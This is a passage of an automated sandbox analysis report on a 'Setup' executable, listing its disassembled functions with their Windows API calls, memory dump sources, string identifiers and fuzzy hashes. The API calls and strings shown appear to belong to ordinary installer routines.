                                                              Uniqueness Score: -1.00%

                                                              Function 6C94586D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C945874
                                                              • OpenMutexW.KERNEL32(00100000,00000000,00000030,?,Global\,00000000,6C95BDA7,?,00000000,?,?,?,?,?,Command-line option error: ,?), ref: 6C9458FB
                                                              • CreateMutexW.KERNEL32(00000000,00000000,00000030), ref: 6C94590B
                                                              • GetLastError.KERNEL32 ref: 6C945913
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Mutex$CreateErrorLastOpen
                                                              • String ID: Global\
                                                              • API String ID: 2685780869-188423391
                                                              • Opcode ID: cc0f565dca9138db1cf83e0506ab6d9b63d03e6d91068d6d5668146622bdc498
                                                              • Instruction ID: 2e870261126a13f6a99b14ef7ee21358f0fbb8b6e6bb0de804d0ab805aa99707
                                                              • Opcode Fuzzy Hash: cc0f565dca9138db1cf83e0506ab6d9b63d03e6d91068d6d5668146622bdc498
                                                              • Instruction Fuzzy Hash: B721AF71601244DFDB15DFA4C488B9A7BF1AF65328F248499F854CF782CB74C954CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C934A3F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C934A46
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: evaluates to 'in maintenance mode'$ evaluates to 'not in maintenance mode'$MaintenanceMode determination$evaluating EnterMaintenanceModeIf
                                                              • API String ID: 431132790-4185790000
                                                              • Opcode ID: 5183a711936c51e2768bb100b7e1c32248536b08220ff8918a51eb55fec27bd7
                                                              • Instruction ID: 4fcbd28434b0e22bce743ee5fe0734e0fa8ec8641a2d28b989effcd403e33d3a
                                                              • Opcode Fuzzy Hash: 5183a711936c51e2768bb100b7e1c32248536b08220ff8918a51eb55fec27bd7
                                                              • Instruction Fuzzy Hash: AA118271801149EFDF10DBA8C944BEDBBB8AF26308F148456E564EBB81C771DB49CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C49D2BF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C49D2C6
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                              • SetDlgItemTextW.USER32(?,0000000B,00000000), ref: 6C49D2FC
                                                              • SetDlgItemTextW.USER32(?,00000008,00000000), ref: 6C49D33B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3ItemText
                                                              • String ID: IDS_CLOSE$IDS_CONTINUE
                                                              • API String ID: 2008326593-3637486705
                                                              • Opcode ID: 9bdc8381cc86d41e185d195eb72081791d69079024833c563ecf4323e764e121
                                                              • Instruction ID: 283e92ffdac0c7680104a19c7befa9c95169adb449f2f43a0f7433a273db52ef
                                                              • Opcode Fuzzy Hash: 9bdc8381cc86d41e185d195eb72081791d69079024833c563ecf4323e764e121
                                                              • Instruction Fuzzy Hash: 63113C31A005059FDB10EBE8C989EAEB7F1BF49314F14425CE116AB7E0DB30E904CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A5848 Relevance: 7.7, APIs: 5, Instructions: 181COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4A584F
                                                              • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,6C4A55AE,?,00000000,?,?,?,?,00000024,6C48F18B), ref: 6C4A58BC
                                                              • GetTokenInformation.KERNELBASE(?,00000001,00000010,00000008,00000008,?,?,6C4A55AE,?,00000000,?,?,?,?,00000024,6C48F18B), ref: 6C4A591F
                                                              • _strnlen.LIBCMT ref: 6C4A596F
                                                                • Part of subcall function 6C4A83ED: __CxxThrowException@8.LIBCMT ref: 6C4A83E2
                                                              • FindCloseChangeNotification.KERNEL32(?,?,?,6C4A55AE,?,00000000,?,?,?,?,00000024,6C48F18B,?), ref: 6C4A599C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: InformationToken$ChangeCloseException@8FindH_prolog3NotificationThrow_strnlen
                                                              • String ID:
                                                              • API String ID: 182814276-0
                                                              • Opcode ID: 28c5ecde34a20941d8641eeb375bc766c7ce6b41032d8893a6877d35e4b4599f
                                                              • Instruction ID: 423a0381adfa5a1aede11f7d6ec571bb6d4bd412511fbd0babfae7c860caf62e
                                                              • Opcode Fuzzy Hash: 28c5ecde34a20941d8641eeb375bc766c7ce6b41032d8893a6877d35e4b4599f
                                                              • Instruction Fuzzy Hash: 93717D7190014A9FDF00CFA8C845EEEBBB4FF14328F044619F924AB695D770DA1ACBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95A4AF Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C95A4B6
                                                              • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,6C95A210,?,00000000,?,?,6C944B23), ref: 6C95A523
                                                              • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000008,00000008,00000008,?,?,6C95A210,?,00000000,?,?,6C944B23), ref: 6C95A566
                                                              • LookupAccountSidW.ADVAPI32(00000000,00000000,00000000,00000008,00000010,00000008,6C944614,00000008,00000104,?,?,6C95A210,?,00000000), ref: 6C95A59C
                                                                • Part of subcall function 6C968AFC: _wcsnlen.LIBCMT ref: 6C968B0C
                                                              • FindCloseChangeNotification.KERNEL32(?,?,?,6C95A210,?,00000000,?,?,6C944B23), ref: 6C95A5CF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: InformationToken$AccountChangeCloseFindH_prolog3LookupNotification_wcsnlen
                                                              • String ID:
                                                              • API String ID: 385857651-0
                                                              • Opcode ID: 9690e59a7b2e53887c9dc71d2971870f117dec0b309d3f815313a3f206f19271
                                                              • Instruction ID: 59bd84f5524f235aa9516c82d84611d1a6fee3bdb69b05ee25b580afd98dc481
                                                              • Opcode Fuzzy Hash: 9690e59a7b2e53887c9dc71d2971870f117dec0b309d3f815313a3f206f19271
                                                              • Instruction Fuzzy Hash: 56613A729002099BDF01CFA8C845AEE7BB5BF25328F144609F920A77D0DB74DA65CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C944880 Relevance: 7.6, APIs: 5, Instructions: 136threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C94488A
                                                                • Part of subcall function 6C9431D3: __EH_prolog3_catch.LIBCMT ref: 6C9431DA
                                                                • Part of subcall function 6C9431D3: _free.LIBCMT ref: 6C943269
                                                              • GetCurrentThread.KERNEL32 ref: 6C94495F
                                                              • OpenThreadToken.ADVAPI32(00000000,00000008,00000001,?), ref: 6C944971
                                                              • GetCurrentProcess.KERNEL32 ref: 6C94497B
                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C94498B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken$H_prolog3_H_prolog3_catch_free
                                                              • String ID:
                                                              • API String ID: 4058884840-0
                                                              • Opcode ID: 7ef450da68c20fefea9bb1beb0b8833fea27fb0f3bc2ffa3dc3e098979a21fea
                                                              • Instruction ID: f5a611f64adae2de7b23ff9aa7241f52f97f13fed55136cae2c9713bf1969852
                                                              • Opcode Fuzzy Hash: 7ef450da68c20fefea9bb1beb0b8833fea27fb0f3bc2ffa3dc3e098979a21fea
                                                              • Instruction Fuzzy Hash: 3D51F7B19002598BDF24DFA4C995BDDB7B4BF24308F5084EA951AB7A40DB709F88CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C925CE1 Relevance: 7.6, APIs: 5, Instructions: 113comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C925CE8
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                              • CoInitialize.OLE32(00000000), ref: 6C925D1A
                                                              • CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,?,00000014,6C925F14,?,?,?,?,512AC3CC,ParameterInfo.xml,00000000), ref: 6C925D38
                                                              • CoUninitialize.OLE32(?,?,00000014,6C925F14,?,?,?,?,512AC3CC,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?), ref: 6C925DE8
                                                              • SysFreeString.OLEAUT32(00000738), ref: 6C925DF1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CreateException@8FileFreeInitializeInstanceModuleNamePathRelativeStringThrowUninitialize
                                                              • String ID:
                                                              • API String ID: 2737710906-0
                                                              • Opcode ID: 2282a8ec3f814ad08e0b30ed09eaf15eff463822d67f942cd2dbbc9dceb79e01
                                                              • Instruction ID: 5e309e84ae4c99f9dc208c107d4eeddb0ab7f240c952ad4f681a902c0e36760e
                                                              • Opcode Fuzzy Hash: 2282a8ec3f814ad08e0b30ed09eaf15eff463822d67f942cd2dbbc9dceb79e01
                                                              • Instruction Fuzzy Hash: 0C415EB0A11249EFDF00CFA4C888AAD7BB9BF55308F2484A8F595DB645C739DE45CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C959BB9 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C959BC3
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                              • GetCommandLineW.KERNEL32(?,?,6C90A794,?,?,00000164,6C934730,02642228,6C90A794,?,?,?,6C95B57F,?,00000000,?), ref: 6C959BEF
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                              • SysFreeString.OLEAUT32(?), ref: 6C959C42
                                                              • SysFreeString.OLEAUT32(6C94FA6E), ref: 6C959CCC
                                                              • SysFreeString.OLEAUT32(?), ref: 6C959CF3
                                                                • Part of subcall function 6C93473C: __EH_prolog3_catch.LIBCMT ref: 6C934746
                                                                • Part of subcall function 6C93473C: CoInitialize.OLE32(00000000), ref: 6C9347F7
                                                                • Part of subcall function 6C93473C: CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,?,?,?,6C913864,?,00000000,00000000,6C94FA6E,00000738,IronMan::EngineData::CreateEngineData), ref: 6C934815
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$FreeString$CommandCreateException@8FileH_prolog3_catchInitializeInstanceLineModuleNamePathRelativeThrow
                                                              • String ID:
                                                              • API String ID: 3727545618-0
                                                              • Opcode ID: ddac5b69c6f891cc18835635acc0096d8d903f9e4eaf16b0c4d1ca9e2c41c5dd
                                                              • Instruction ID: 01f5f68de264a78d04c3595da2be3177a159e2faf08d166e790470c3edb8fe6a
                                                              • Opcode Fuzzy Hash: ddac5b69c6f891cc18835635acc0096d8d903f9e4eaf16b0c4d1ca9e2c41c5dd
                                                              • Instruction Fuzzy Hash: 5A41257280024DEFDF01DFA4CC44AEEBBB9AF25318F104155E525A7A90CB34DA19CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C496655 Relevance: 7.6, APIs: 5, Instructions: 72windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C49665C
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C49F35E: __EH_prolog3.LIBCMT ref: 6C49F365
                                                                • Part of subcall function 6C49F35E: __recalloc.LIBCMT ref: 6C49F3A7
                                                              • _memset.LIBCMT ref: 6C4966C3
                                                              • GetClientRect.USER32 ref: 6C4966E6
                                                              • SendMessageW.USER32(00000001,00000432,00000000,?), ref: 6C4966FC
                                                                • Part of subcall function 6C4A81DE: _memcpy_s.LIBCMT ref: 6C4A8224
                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000040,6C49730F,?,?,?,?,?,?,?,?,?), ref: 6C496713
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ClientExceptionH_prolog3_MessageRaiseRectSend__recalloc_memcpy_s_memset
                                                              • String ID:
                                                              • API String ID: 4097222183-0
                                                              • Opcode ID: c2f68cafad33883a537c59d8619b66ec96800ae953dfd70bf550330eb318c2dc
                                                              • Instruction ID: 083194bd1bd1c5c43eaf9e27d35cc7e01bb06654e3aad3ad0c022fe964278d7e
                                                              • Opcode Fuzzy Hash: c2f68cafad33883a537c59d8619b66ec96800ae953dfd70bf550330eb318c2dc
                                                              • Instruction Fuzzy Hash: 4C21E471901118AFDB24DFA8C888E9EBBB8FF45318F14411EF515A7650DB70AA46CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C970F64 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _malloc.LIBCMT ref: 6C970F72
                                                                • Part of subcall function 6C96BFB3: __FF_MSGBANNER.LIBCMT ref: 6C96BFCC
                                                                • Part of subcall function 6C96BFB3: __NMSG_WRITE.LIBCMT ref: 6C96BFD3
                                                                • Part of subcall function 6C96BFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,6C94831D,00000000,?,6C96C0C9,6C94F845,00000C00,00000020,6C94F845,?), ref: 6C96BFF8
                                                              • _free.LIBCMT ref: 6C970F85
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free_malloc
                                                              • String ID:
                                                              • API String ID: 1020059152-0
                                                              • Opcode ID: 9b7591d7fec2ab6a5e5feec2127e4c174aaca588326d457e6b54d2f5e8c84fd7
                                                              • Instruction ID: fe88e3566ba4614508fe34f3fe982b93c0e7fa7c6ea1129a1e746db4f0ccc5c3
                                                              • Opcode Fuzzy Hash: 9b7591d7fec2ab6a5e5feec2127e4c174aaca588326d457e6b54d2f5e8c84fd7
                                                              • Instruction Fuzzy Hash: 29110B3250A291EBDB311A79F91468D3A78AF613A8B215135F818DAE80EF35C45096F0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A5F10 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 6C4A5F27
                                                              • GetWindowLongW.USER32(?,000000FC), ref: 6C4A5F3E
                                                              • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 6C4A5F50
                                                              • GetWindowLongW.USER32(?,000000FC), ref: 6C4A5F6A
                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 6C4A5F79
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$CallProc
                                                              • String ID:
                                                              • API String ID: 513923721-0
                                                              • Opcode ID: ae134b25d07bbe217795593d139242ae5d8ee26635580a5dd3e99a5c6017e841
                                                              • Instruction ID: 287def3923192555e1f92b9ac994cd0092f3aaff63d14a0a199f3e6d97a8bc4a
                                                              • Opcode Fuzzy Hash: ae134b25d07bbe217795593d139242ae5d8ee26635580a5dd3e99a5c6017e841
                                                              • Instruction Fuzzy Hash: 34211871604A04EFCB21DFA9C984D5ABBF1FB593207108A1DF8AAD2AA0D731E951DF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C919703 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91970A
                                                              • VariantInit.OLEAUT32(?), ref: 6C91971B
                                                              • SysFreeString.OLEAUT32(6C90A794), ref: 6C919751
                                                              • SysAllocString.OLEAUT32(6C913864), ref: 6C919768
                                                              • VariantClear.OLEAUT32(?), ref: 6C91978E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: StringVariant$AllocClearFreeH_prolog3Init
                                                              • String ID:
                                                              • API String ID: 1692324188-0
                                                              • Opcode ID: 82afbaadc4d6afaa09f19d1366194a3a46f24d8e6c714fde74a6e60fbe866fee
                                                              • Instruction ID: 6ff9d9e90aefbbbace6f90768300bf82e8abdb95fc722f6f634d04d20af39237
                                                              • Opcode Fuzzy Hash: 82afbaadc4d6afaa09f19d1366194a3a46f24d8e6c714fde74a6e60fbe866fee
                                                              • Instruction Fuzzy Hash: E4116D70A04248EBDF11DFA4D848EDDB7B8BF25719F048159E824EBA40D778CA04DB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C935238 Relevance: 7.5, APIs: 5, Instructions: 49processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C935254
                                                              • _memset.LIBCMT ref: 6C93526E
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 6C935288
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 6C9352A3
                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 6C9352B7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32_memset
                                                              • String ID:
                                                              • API String ID: 949835396-0
                                                              • Opcode ID: 458c84cb49e57d0d98cd48f3bf810be8b52667a48375f4fd41be00df8ed93d14
                                                              • Instruction ID: bac9d8b3c5ed6b8928ac6850b99fb3bd6dd76d71cb55042ee44710afd4af305d
